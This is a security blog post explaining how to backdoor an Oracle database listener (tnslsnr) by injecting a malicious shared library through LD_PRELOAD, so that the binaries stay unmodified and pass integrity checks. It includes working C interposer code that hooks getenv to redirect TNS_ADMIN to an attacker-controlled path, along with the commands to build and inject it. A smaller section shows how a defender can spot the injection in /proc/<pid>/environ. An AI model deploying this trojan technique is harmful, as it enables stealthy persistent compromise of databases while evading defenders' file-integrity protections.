Using LD_PRELOAD to implement a hidden trojan in an oracle database

In one of my previous posts I showed how a backdoor can be injected into an Oracle database, based on Dennis Yurichev's findings. That method required modifying the Oracle executable files. A few days ago Rodrigo Jorge shared a blog post explaining how to add another layer of security to the Oracle binaries to protect them against improper changes. That motivated me to check whether I can still implement the hidden trojan without modifying the Oracle executable files at all.

Since we are interested in the Oracle listener, let's check which shared libraries its executable (tnslsnr) depends on:

[screenshot: Capture 500]

So if I can get tnslsnr to load the infected libclntsh.so.12.1 from my previous post in place of the genuine one, the job is done. Unlike the oracle executable, tnslsnr has neither the set-user-ID nor the set-group-ID bit set, so the dynamic loader does not run it in secure-execution mode: its AT_SECURE auxiliary-vector entry is 0 (ls -l on the binary shows no s bit, and running it with LD_SHOW_AUXV=1 prints the AT_SECURE value). Outside secure-execution mode the loader honours the LD_PRELOAD environment variable, which names shared objects to load ahead of all others, so setting it in the listener's environment is enough to selectively override the functions of libclntsh.so.12.1. The Oracle executable files on disk stay untouched, which is exactly what an integrity check on the binaries would be looking at.

[screenshot: Capture 501]

Exploit:

[screenshot: Capture 502]
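As an added worked example (not code from this post, from the earlier post, or from Oracle), here is a minimal LD_PRELOAD shim of the kind the exploit relies on, together with the AT_SECURE check that decides whether the loader will honour LD_PRELOAD at all, and the scan a defender can run over a process's /proc/<pid>/environ to spot the injection that a file-integrity check on the binaries misses. The hooked symbol (getenv), the redirected variable (TNS_ADMIN), the path /tmp/evil_tns_admin and the two sample environ blocks are stand-ins constructed for the demo; the real trojan overrides functions inside libclntsh.so.12.1, whose names this post does not give.

```c
/* Added example: LD_PRELOAD interposer + AT_SECURE check + environ scan.
 * Build as a shared object and inject into a non-setuid target:
 *   gcc -shared -fPIC -o /tmp/shim.so shim.c      (add -ldl on glibc < 2.34)
 *   LD_PRELOAD=/tmp/shim.so lsnrctl start          (tnslsnr inherits the environment)
 * Compiled as a normal executable, the same file also demonstrates the hook
 * against its own libc, which is what the assertions below exercise. */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <sys/auxv.h>

#ifndef RTLD_NEXT                  /* glibc's value, in case _GNU_SOURCE was not seen */
#define RTLD_NEXT ((void *) -1l)
#endif

/* Non-zero when the kernel marked this process for secure execution
 * (set-user-ID, set-group-ID or file capabilities). In that mode glibc
 * ignores LD_PRELOAD entries containing a slash and only preloads
 * set-user-ID libraries from the standard library directories, which is
 * why the trick works on tnslsnr but not on the setuid oracle binary. */
int running_in_secure_mode(void)
{
    return getauxval(AT_SECURE) != 0;
}

/* --- the interposer: override one symbol, forward everything else --- */
typedef char *(*getenv_fn)(const char *);
static getenv_fn real_getenv;      /* resolved lazily from the next object in search order */
static unsigned long hook_hits;    /* how often the hook fired (for the demo) */
static char evil_tns_admin[] = "/tmp/evil_tns_admin";   /* constructed value */

char *getenv(const char *name)
{
    if (!real_getenv)
        real_getenv = (getenv_fn) dlsym(RTLD_NEXT, "getenv");
    if (name && strcmp(name, "TNS_ADMIN") == 0) {
        hook_hits++;
        return evil_tns_admin;     /* point the listener at attacker-controlled config */
    }
    return real_getenv(name);      /* transparent pass-through for every other lookup */
}

unsigned long getenv_hook_hits(void)
{
    return hook_hits;
}

/* --- the defender's check ---
 * /proc/<pid>/environ is a block of NUL-separated "KEY=VALUE" strings.
 * Returns 1 if the block carries LD_PRELOAD (or LD_LIBRARY_PATH when
 * include_libpath is set), 0 otherwise. Hashing $ORACLE_HOME/bin does not
 * see this; the running process's environment does. */
int environ_has_preload(const char *buf, size_t len, int include_libpath)
{
    size_t i = 0;
    while (i < len) {
        const char *entry = buf + i;
        size_t n = 0;
        while (i + n < len && buf[i + n] != '\0')
            n++;
        if (n >= 11 && strncmp(entry, "LD_PRELOAD=", 11) == 0)
            return 1;
        if (include_libpath && n >= 16 && strncmp(entry, "LD_LIBRARY_PATH=", 16) == 0)
            return 1;
        i += n + 1;                /* skip the entry and its NUL terminator */
    }
    return 0;
}

/* Constructed /proc/<pid>/environ contents for the demo (NUL-separated). */
static const char sample_environ_injected[] =
    "PATH=/usr/bin\0LD_PRELOAD=/tmp/shim.so\0HOME=/home/oracle\0";
static const char sample_environ_clean[] =
    "PATH=/usr/bin\0HOME=/home/oracle\0LD_LIBRARY_PATH=/u01/app/oracle/lib\0";

int demo_detects_injected(void)
{
    return environ_has_preload(sample_environ_injected, sizeof sample_environ_injected, 0);
}

int demo_flags_clean(int include_libpath)
{
    return environ_has_preload(sample_environ_clean, sizeof sample_environ_clean, include_libpath);
}
```

The hook resolves the genuine implementation with dlsym(RTLD_NEXT, ...) on first use, so the preloaded object sits in front of libclntsh.so.12.1 and libc in the lookup order while every call it does not care about still reaches the real code; that is what keeps the trojan invisible to the listener's normal operation. On the defensive side, reading /proc/<pid>/environ of the running tnslsnr (root or the oracle user) is enough to see the LD_PRELOAD entry, and /proc/<pid>/maps lists the shim itself among the mapped objects.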

That’s it 😀

